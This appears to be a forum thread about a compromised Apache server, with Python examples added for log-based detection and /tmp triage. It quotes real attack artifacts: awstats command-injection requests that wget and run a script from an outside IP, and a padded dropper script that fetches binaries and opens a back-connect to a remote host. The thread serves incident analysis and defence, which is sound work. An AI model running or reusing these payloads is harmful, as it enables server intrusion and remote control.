# Attempted hack?

## quijibo

I ran the last update and tried to get PHP working under the new method (dev-lang/php).  I got it all upgraded and everything seemed to work fine, with the exception that I couldn't get the postnuke script to run.  However, the installer, squirrelmail, etc. work fine.  Anyways, that is a different issue, unrelated to this I hope.  But in an attempt to figure out why that wasn't working, while looking through the error_log, I did find this very strange looking error.

```
--08:17:18--  http://211.234.113.241/scripz
           => `scripz'
Connecting to 211.234.113.241:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 299 [text/plain]
    0K                                                       100%
08:17:18 (25.92 MB/s) - `scripz' saved [299/299]
--08:17:18--  http://219.84.105.36/ping
           => `ping'
Connecting to 219.84.105.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,145 (11K) [text/plain]
    0K ..[Sat Feb 11 08:17:18 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/blog
........                                            100% 38.3K
08:17:18 (38.29 KB/s) - `ping' saved [11145/11145]
lordnikonz: no process killed
--08:17:18--  http://219.84.105.36/httpd
           => `httpd'
Connecting to 219.84.105.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 400,492 (391K) [text/plain]
    0K .......... .......... .........[Sat Feb 11 08:17:19 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/blog
. .......... .......... 12% 43.5K   0:07
   50K .......... .......... .......... ...[Sat Feb 11 08:17:20 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/blogs
....... .......... 25% 46.5K   0:06
  100K .......... .......... .......... ......[Sat Feb 11 08:17:21 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/drupal
.... .......... 38% 43.5K   0:05
  150K .......... .......... .......... ....[Sat Feb 11 08:17:23 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/phpgroupware
...... .......... 51% 41.2K   0:04
  200K .......... .......... ..........[Sat Feb 11 08:17:24 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/wordpress
 .......... .......... 63% 40.3K   0:03
  250K .......... .......... ..........--08:17:25--  http://211.234.113.241/scripz
           => `scripz.1'
Connecting to 211.234.113.241:80...  ..connected.
HTTP request sent, awaiting response... ..200 OK
Length: 299 [text/plain]
    0K                                                       100%
08:17:25 (57.03 MB/s) - `scripz.1' saved [299/299]
mkdir: cannot create directory `.a': File exists
--08:17:25--  http://219.84.105.36/ping
           => `ping'
Connecting to 219.84.105.36:80... ...... .......... 76% 38.0K   0:02
  300K .......... .......... ..[Sat Feb 11 08:17:26 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/xmlrpc
........ .........connected.
HTTP request sent, awaiting response... . .......... 89% 42.5K
  350K .......... .......... .[Sat Feb 11 08:17:27 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/xmlsrv
......... .......... .         100% 40.3K
08:17:28 (41.85 KB/s) - `httpd' saved [400492/400492]
200 OK
Length: 11,145 (11K) [text/plain]
    0K ..........                                            100% 14.3K
08:17:29 (14.29 KB/s) - `ping' saved [11145/11145]
lordnikonz: no process killed
--08:17:29--  http://219.84.105.36/httpd
           => `httpd.1'
Connecting to 219.84.105.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 400,492 (391K) [text/plain]
    0K .......... .......... .......... .......... .......... 12% 42.2K   0:08
   50K .......... .......... .......... .......... .......... 25% 44.2K   0:06
  100K .......... .......... .......... .......... .......... 38% 43.0K   0:05
  150K .......... .......... .......... .......... .......... 51% 42.2K   0:04
  200K .......... .......... .......... .......... .......... 63% 43.2K   0:03
  250K .......... .......... .......... .......... .......... 76% 38.7K   0:02
  300K .......... .......... .......... .......... .......... 89% 40.9K   0:01
  350K .......... .......... .......... .......... .         100% 39.8K
08:17:38 (41.74 KB/s) - `httpd.1' saved [400492/400492]
[Sat Feb 11 09:30:20 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/awstats
[Sat Feb 11 09:30:22 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
[Sat Feb 11 09:30:23 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats
--09:30:26--  http://211.234.113.241/scripz
           => `scripz.2'
Connecting to 211.234.113.241:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 299 [text/plain]
    0K                                                       100%
09:30:26 (20.37 MB/s) - `scripz.2' saved [299/299]
mkdir: cannot create directory `.a': File exists
--09:30:26--  http://219.84.105.36/ping
           => `ping'
Connecting to 219.84.105.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,145 (11K) [text/plain]
    0K ..........                                            100% 43.9K
09:30:27 (43.80 KB/s) - `ping' saved [11145/11145]
lordnikonz: no process killed
--09:30:27--  http://219.84.105.36/httpd
           => `httpd.2'
Connecting to 219.84.105.36:80... connected.
HTTP request sent, awaiting response... [Sat Feb 11 09:30:27 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/blog
200 OK
Length: 400,492 (391K) [text/plain]
    0K .......... .......... .......... .......... .......... 12% 46.6K   0:07
   50K .........[Sat Feb 11 09:30:28 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/blog
. .......... .......... .......... .......... 25% 46.4K   0:06
  100K .......... ........[Sat Feb 11 09:30:29 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/blogs
.. .......... .......... .......... 38% 42.7K   0:05
  150K .......... ..........[Sat Feb 11 09:30:31 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/drupal
 .......... .......... .......... 51% 36.7K   0:05
  200K .......... .......... ....[Sat Feb 11 09:30:32 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/phpgroupware
...... .......... .......... 63% 37.2K   0:03
  250K .......... .......... .....[Sat Feb 11 09:30:34 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/wordpress
..... .......... .......... 76% 40.5K   0:02
  300K .......... .......... .......... ...--09:30:35--  http://211.234.113.241/scripz
           => `scripz.3'
Connecting to 211.234.113.241:80... ...connected.
HTTP request sent, awaiting response... 200 OK
Length: 299 [text/plain]
```

And etc...   it goes up to xxxx.5.  I turned off apache for right now, but is this due to my part of not securing apache, or enabling some feature that I shouldn't have, or something more?   Currently I am running apache like this:

```
[ebuild   R   ] net-www/apache-2.0.55-r1  +apache2 -debug -doc -ldap -mpm-leader -mpm-peruser +mpm-prefork -mpm-threadpool -mpm-worker -no-suexec (-selinux) +ssl -static-modules +threads 0 kB
```

I had to enable one of the MPMs so it would work correctly with the new way PHP is used now.  Anyways, going to the files that were somehow uploaded onto my machine, I got this:

```
#!/bin/bash

(about 100 lines of blank text here to hide what was below)

cd /tmp
mkdir .a
cd .a
wget 219.84.105.36/ping
mv ping cb
chmod +x cb
./cb 210.245.233.251 8080 &
killall -9 lordnikonz
wget 219.84.105.36/httpd
chmod +x httpd
rm -rf scripz
export PATH="."
httpd
```

Going to that directory I got this:

```
.a # ls -al
total 2408
drwxr-xr-x   2 apache apache   4096 Feb 11 10:52 .
drwxrwxrwt  11 root   root    12288 Feb 11 12:34 ..
-rwxr-xr-x   1 apache apache  11145 Jan 14 21:52 cb
-rwxr-xr-x   1 apache apache 400492 Feb  5 23:10 httpd
-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.1
-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.2
-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.3
-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.4
-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.5
-rw-r--r--   1 apache apache   1311 Feb 11 10:52 listen.log
```

And a cat of the listen.log reveals:

```
.a # cat listen.log
11/01 08:17:28 [26284] [26304] =========================
11/01 08:17:28 [26284] [26304] starting server build 578
11/01 08:17:28 [26284] [26304] WARNING no internet routeable ips found
11/01 08:17:28 [26284] [26304] all ok until now going background
11/01 08:17:28 [1] [26306] demonized
11/01 08:17:38 [26299] [26317] =========================
11/01 08:17:38 [26299] [26317] starting server build 578
11/01 08:17:38 [26299] [26317] [FATAL] unable to bind port, errno=98, Address already in use
11/01 09:30:37 [31795] [31813] =========================
11/01 09:30:37 [31795] [31813] starting server build 578
11/01 09:30:37 [31795] [31813] [FATAL] unable to bind port, errno=98, Address already in use
11/01 09:30:47 [31808] [31822] =========================
11/01 09:30:47 [31808] [31822] starting server build 578
11/01 09:30:47 [31808] [31822] [FATAL] unable to bind port, errno=98, Address already in use
11/01 10:52:29 [5166] [5186] =========================
11/01 10:52:29 [5166] [5186] starting server build 578
11/01 10:52:29 [5166] [5186] [FATAL] unable to bind port, errno=98, Address already in use
11/01 10:52:39 [5180] [5195] =========================
11/01 10:52:39 [5180] [5195] starting server build 578
11/01 10:52:39 [5180] [5195] [FATAL] unable to bind port, errno=98, Address already in use
```

So whatever this person in Taiwan (from a traceroute) was trying to do failed, *thankfully*.  The two files that it tried to put on were some binary files that I can't make out, but at the end of the httpd one it did have this:

GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-42)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-42)^@^@GCC: (GNU) 3.2.3 2003 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat) ....  you get the idea

I know I haven't locked down my network as well as it could be, but is it a problem because of that, or a setting, or a bug, or what?  Please forgive me if this is a stupid question, but I don't have anyone to ask around where I am at.

Oh, here is the pertinent access_log stuff as well, and as you can see at the end someone was trying to do something yet again before I shut down apache.  The kind of mind-scratching thing here, though, is why were the same attacks coming from two completely different IPs?

```
61.92.23.173 - - [11/Feb/2006:05:13:36 +0900] "GET / HTTP/1.1" 404 142
222.235.161.34 - - [11/Feb/2006:05:19:34 +0900] "GET / HTTP/1.1" 404 142
67.19.153.84 - - [11/Feb/2006:08:17:12 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
67.19.153.84 - - [11/Feb/2006:08:17:13 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
67.19.153.84 - - [11/Feb/2006:08:17:15 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 287
67.19.153.84 - - [11/Feb/2006:08:17:17 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 276
67.19.153.84 - - [11/Feb/2006:08:17:18 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283
67.19.153.84 - - [11/Feb/2006:08:17:19 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
67.19.153.84 - - [11/Feb/2006:08:17:20 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278
67.19.153.84 - - [11/Feb/2006:08:17:22 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284
67.19.153.84 - - [11/Feb/2006:08:17:23 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281
67.19.153.84 - - [11/Feb/2006:08:17:25 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278
67.19.153.84 - - [11/Feb/2006:08:17:26 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278
160.99.12.231 - - [11/Feb/2006:09:30:20 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
160.99.12.231 - - [11/Feb/2006:09:30:22 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
160.99.12.231 - - [11/Feb/2006:09:30:23 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 287
160.99.12.231 - - [11/Feb/2006:09:30:26 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 276
160.99.12.231 - - [11/Feb/2006:09:30:27 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283
160.99.12.231 - - [11/Feb/2006:09:30:28 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
160.99.12.231 - - [11/Feb/2006:09:30:30 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278
160.99.12.231 - - [11/Feb/2006:09:30:31 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284
160.99.12.231 - - [11/Feb/2006:09:30:32 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281
160.99.12.231 - - [11/Feb/2006:09:30:35 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278
160.99.12.231 - - [11/Feb/2006:09:30:37 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278
211.214.161.139 - - [11/Feb/2006:10:52:14 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
211.214.161.139 - - [11/Feb/2006:10:52:16 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
211.214.161.139 - - [11/Feb/2006:10:52:17 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 287
211.214.161.139 - - [11/Feb/2006:10:52:19 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 276
211.214.161.139 - - [11/Feb/2006:10:52:20 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283
211.214.161.139 - - [11/Feb/2006:10:52:21 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
211.214.161.139 - - [11/Feb/2006:10:52:22 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278
211.214.161.139 - - [11/Feb/2006:10:52:23 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284
211.214.161.139 - - [11/Feb/2006:10:52:24 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281
211.214.161.139 - - [11/Feb/2006:10:52:26 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278
211.214.161.139 - - [11/Feb/2006:10:52:27 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278
220.167.25.2 - - [11/Feb/2006:11:40:49 +0900] "GET / HTTP/1.1" 404 142
65.102.23.161 - - [11/Feb/2006:12:04:53 +0900] "GET / HTTP/1.0" 404 142
```

Sorry for the long post, but I hope this is all of the correct information.  Thanks in advance.
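The access_log above is the one place where the entry vector is visible before anything lands on disk: a URL-encoded shell pipeline inside a CGI parameter, followed by a sweep of `POST`s to every common `xmlrpc.php` location. The following is an added example (not code from the thread or from any project named in it) of a small detector that URL-decodes each query string, flags shell metacharacters and download-and-run vocabulary, and counts `xmlrpc.php` probes per client. The sample lines are copied from the post; the Apache log regex, the metacharacter list and the probe threshold of 3 are my own assumptions.

```python
import re
from collections import Counter, namedtuple
from urllib.parse import unquote

# One Apache common/combined log line: client, ident, user, [timestamp], "request", status, bytes.
# Assumed format; adjust if your LogFormat differs.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Characters that only belong in a query string if it is being handed to a shell.
SHELL_META = re.compile(r'[|;`]|\$\(')
# Download-and-execute vocabulary, as in the awstats requests in the thread.
DROPPER_WORDS = re.compile(r'\bwget\b|\bcurl\b|\bchmod\b|/tmp')

Finding = namedtuple("Finding", "host kind detail status")

def parse_line(line):
    """Return the fields of one Apache log line, or None if the line is not in that format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines, xmlrpc_threshold=3):
    """Scan log lines; return Findings for injection attempts and per-host xmlrpc.php scans."""
    findings = []
    xmlrpc_posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec["target"].partition("?")
        decoded = unquote(query)  # %2f -> /, %3b -> ;, %2e -> . and so on
        if query and SHELL_META.search(decoded):
            kind = "command injection attempt"
            if DROPPER_WORDS.search(decoded):
                kind += " (download-and-execute)"
            # Keep the HTTP status: a 404 means the targeted script was not there,
            # so this request failed, but the client is still worth blocking.
            findings.append(Finding(rec["host"], kind, f"{path}?{decoded}", rec["status"]))
        if rec["method"] == "POST" and path.endswith("/xmlrpc.php"):
            xmlrpc_posts[rec["host"]] += 1
    for host, n in xmlrpc_posts.items():
        if n >= xmlrpc_threshold:
            findings.append(Finding(host, "xmlrpc.php location scan",
                                    f"{n} POSTs to xmlrpc.php paths", "-"))
    return findings

# Sample input: lines taken from the access_log posted in the thread, plus one
# constructed benign request (10.0.0.5) to show what is not flagged.
SAMPLE_LOG = """\
61.92.23.173 - - [11/Feb/2006:05:13:36 +0900] "GET / HTTP/1.1" 404 142
67.19.153.84 - - [11/Feb/2006:08:17:12 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
67.19.153.84 - - [11/Feb/2006:08:17:17 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 276
67.19.153.84 - - [11/Feb/2006:08:17:18 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283
67.19.153.84 - - [11/Feb/2006:08:17:19 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
10.0.0.5 - - [11/Feb/2006:08:20:00 +0900] "GET /index.php?page=news HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"{f.host:16} {f.kind:45} status={f.status} {f.detail}")
```

Run it against a real log with `analyze(open("/var/log/apache2/access_log").read().splitlines())`. The decoded detail line is what makes the 404 meaningful: it shows the full `cd /tmp;wget ...;chmod +x ...` chain the request was trying to run, so you can tell from the access_log alone whether the CGI script it targeted existed on your box.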

----------

## Belandrew

What you are seeing in the logs is one person who has gained access to your system and is uploading stuff to it, mixed in with error messages from other people/bots trying standard PHP exploit attempts that are failing. They are mixed together in such a strange way because they're coming from different unsynchronized sources, probably apache itself and another program that the attacker is running that happens to also be sending its messages to the apache error_log. I would not trust your logs if they weren't being sent to another machine. I would also not trust the system any more at this point, since someone uploading and executing things means the system is compromised. Although it does look like the one script failed due to being badly written, there's no way to be sure what else happened since someone with access can also alter the logs. I would wipe the drive and reinstall from safe media. It's the only way to be sure you have a clean system.

What caused it? My guess would be an outdated php script hole, but it's just that - a guess. PHP exploits are pretty common these days, which is why you see a bunch of attempts at exploiting xmlrpc.php in various places in the logs. I can't see any actual compromise happening in the logs you've listed, but obviously uploading and executing of code was occurring.

----------

## hanj

*Quote:*

> What caused it? My guess would be an outdated php script hole, but it's just that - a guess. PHP exploits are pretty common these days, which is why you see a bunch of attempts at exploiting xmlrpc.php in various places in the logs. I can't see any actual compromise happening in the logs you've listed, but obviously uploading and executing of code was occurring.

This is what started it off... awstats vulnerability. What version of awstats are you running?

```
61.92.23.173 - - [11/Feb/2006:05:13:36 +0900] "GET / HTTP/1.1" 404 142
222.235.161.34 - - [11/Feb/2006:05:19:34 +0900] "GET / HTTP/1.1" 404 142
67.19.153.84 - - [11/Feb/2006:08:17:12 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
67.19.153.84 - - [11/Feb/2006:08:17:13 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
67.19.153.84 - - [11/Feb/2006:08:17:15 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  
```

hanji

----------

## nms

404 errors usually indicate that a requested document, file or script is missing:

```
61.92.23.173 - - [11/Feb/2006:05:13:36 +0900] "GET / HTTP/1.1" 404 142
222.235.161.34 - - [11/Feb/2006:05:19:34 +0900] "GET / HTTP/1.1" 404 142
67.19.153.84 - - [11/Feb/2006:08:17:12 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
67.19.153.84 - - [11/Feb/2006:08:17:13 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
```

Server side errors also confirm this:

```
[Sat Feb 11 09:30:20 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/awstats
[Sat Feb 11 09:30:22 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
[Sat Feb 11 09:30:23 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats
```

----------

## hanj

Ah.. I glazed right over the 404. I'm wondering if it's one of the POSTs.. since it appears that scripz was uploaded to the server.

hanji

----------

## Belandrew

*hanj wrote:*

> Ah.. I glazed right over the 404. I'm wondering if it's one of the POSTs.. since it appears that scripz was uploaded to the server.
> 
> hanji

The "upload" output you see in the logs is consistent with that of wget downloading, though broken up with regular error messages from apache, and also the automatic renaming if you try to download the same file more than once. At that point, the system has already been compromised and the attacker is just downloading his/her extra toys - a trojaned httpd replacement among others.

```
~ # wget 192.168.0.111/index.html
--22:54:33--  http://192.168.0.111/index.html
           => `index.html.1'
Connecting to 192.168.0.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 342 [text/html]
100%[====================================>] 342           --.--K/s
22:54:33 (18.12 MB/s) - `index.html.1' saved [342/342]
```
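Once the logs say files were fetched, the next check is what actually landed on disk. The `ls -al` of `/tmp/.a` earlier in the thread shows the pattern: a dot-directory in a world-writable location, files owned by the web server user, ELF binaries with the execute bit set, and wget's `.1`/`.2` duplicates beside them. Here is an added example (my own code, not from the thread or any project) of a triage walk over such a directory that reports those signals per file. The fixture it builds is constructed to mirror the thread's listing and contains no real malware; the signal list and the reporting rule (ownership alone is never enough, since PHP session files also live in `/tmp`) are my own assumptions.

```python
import os
import stat
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
OWNER_ONLY = "owned by web server uid"

def _reasons(path, rel_parts, st, web_uid):
    """Collect the signals that make one regular file look like a dropper's leftover."""
    reasons = []
    if any(part.startswith(".") for part in rel_parts):
        reasons.append("in hidden directory")
    if st.st_mode & 0o111:
        reasons.append("executable")
    try:
        with open(path, "rb") as fh:
            head = fh.read(4)
    except OSError:
        head = b""
    if head == ELF_MAGIC:
        reasons.append("ELF binary")
    elif head.startswith(b"#!"):
        reasons.append("script with shebang")
    if web_uid is not None and st.st_uid == web_uid:
        reasons.append(OWNER_ONLY)
    return reasons

def dropped_files(root, web_uid=None):
    """Walk root (e.g. /tmp or /var/tmp) and return sorted [(relative_path, reasons)].
    A file is reported when it is hidden, executable, an ELF binary or a script;
    ownership by the web server uid is added as context but never triggers a report by itself."""
    root = Path(root).resolve()
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        rel_parts = Path(dirpath).relative_to(root).parts
        for name in files:
            path = Path(dirpath) / name
            try:
                st = path.lstat()
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets and fifos are out of scope here
            reasons = _reasons(path, rel_parts, st, web_uid)
            if [r for r in reasons if r != OWNER_ONLY]:
                hits.append((str(path.relative_to(root)), reasons))
    return sorted(hits)

def build_fixture(base):
    """Constructed sample tree modelled on the thread's /tmp/.a listing (harmless stand-ins)."""
    base = Path(base)
    hidden = base / ".a"
    hidden.mkdir()
    fake_elf = ELF_MAGIC + b"\x01\x01\x01\x00" * 4          # only the magic bytes, not a real program
    (hidden / "cb").write_bytes(fake_elf)
    os.chmod(hidden / "cb", 0o755)
    (hidden / "httpd.1").write_bytes(fake_elf)               # wget duplicate, never chmod'ed
    (hidden / "listen.log").write_text("11/01 08:17:28 [26284] starting server build 578\n")
    (base / "scripz").write_text("#!/bin/bash\necho constructed sample\n")
    os.chmod(base / "scripz", 0o755)
    (base / "sess_abc123").write_text("benign PHP session data\n")   # normal /tmp noise

def demo():
    """Build the fixture in a temporary directory and return {relative_path: reasons}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return dict(dropped_files(tmp, web_uid=os.getuid()))

if __name__ == "__main__":
    for rel, why in demo().items():
        print(f"{rel}: {', '.join(why)}")
```

On a real box you would call `dropped_files("/tmp", web_uid=pwd.getpwnam("apache").pw_uid)` and then preserve anything it lists (copy it off with timestamps intact) before cleaning up, since those files plus the `listen.log` they wrote are the evidence of what the dropper was and whether it ever ran.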

----------

## Johnyp

I had a similar hack run against my machine. It turned out to be an xmlrpc file in a drupal install. Most php apps had this vulnerability.

Check all of your web-apps to make sure they are patched up, all files are secured and no xmlrpc exploits are known for your versions.

----------

## quijibo

I just went ahead and reinstalled the system for now.  I wanted to do this anyways since the last time I installed Gentoo on this was with the 2004.3 install.  After upgrading it so many times it was doing some strange things, like proftpd crashing for no apparent reason.  Most of the system is back up and running now, but I can't get postnuke to run properly, so I don't keep apache open for very long until I can figure out why I am getting PHP problems with the scripts running.  The strange thing is that the installer for postnuke (.761) seems to work fine...

----------

## fidel

I got a similar problem. Is there a way to find out where the security hole lies? The log file from apache (error_log) shows the following entry:

```
--07:20:06--  http://81.58.26.26/libsh/ping.txt
           => `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
    0K                                                       100% 
07:20:06 (18.97 MB/s) - `ping.txt' saved [358/358]
--07:20:06--  http://81.58.26.26/libsh/ping
           => `ping'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 (15K) [text/plain]
    0K .......... .....                                      100% 26.5K       
07:20:08 (26.51 KB/s) - `ping' saved [15808/15808]
chmod: invalid mode string: `x'
sh: ./ping: Permission denied
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  6 15808    6  1169    0     0   4683      0  0:00:03 --:--:--  0:00:03  4683
 53 15808   53  8409    0     0  12849      0  0:00:01 --:--:--  0:00:01 17876
100 15808  100 15808    0     0  16372      0 --:--:-- --:--:-- --:--:-- 20445
chmod: invalid mode string: `x'
sh: ./ping: Permission denied
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   358  100   358    0     0   2841      0 --:--:-- --:--:-- --:--:--  2841
100   358  100   358    0     0   2834      0 --:--:-- --:--:-- --:--:--     0
[Fri Apr 21 11:08:28 2006] [error] cgid daemon process died, restarting
```

The entire system died three days ago and a fresh reinstall can't easily be done; the server is situated in a computer center...

Unfortunately in the access_log I can't find anything related to this....

How do I have to interpret this entry? Is it that someone gained access to the machine by gaining control over apache? So at least there is no way for the hacker to gain access to ssh!?

Thanks in advance!!!

greets

----------

## lesourbe

I ain't an expert but...

upload, chmod +x uploaded_file, sh uploaded_file...

It seems that chmod and sh both failed, but is it the output of the script that we see?

If it is, and if apache is run by root, you can't trust your system anymore.

----------

## fidel

It's the entry in my log file:

/var/log/apache2/error_log

